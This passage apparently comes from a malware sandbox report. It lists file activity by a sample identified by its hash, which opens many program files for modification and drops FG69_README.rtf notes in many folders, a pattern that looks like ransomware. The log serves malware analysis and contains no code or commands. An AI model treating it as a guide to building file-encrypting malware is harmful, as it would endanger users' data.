Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\local_policy.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\WET d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Havana d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\Logo.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\UninstallRemove.nfo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\StopCopy.mpa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Palau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\th.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\DenySet.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\management\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Ojinaga d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SendRequest.3gp2 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Maputo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sl.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Moscow d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\amd64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\HST d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoDev.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\PushOptimize.xlt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST7MDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\de.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\StepStop.dwfx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\UnprotectConnect.cmd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT 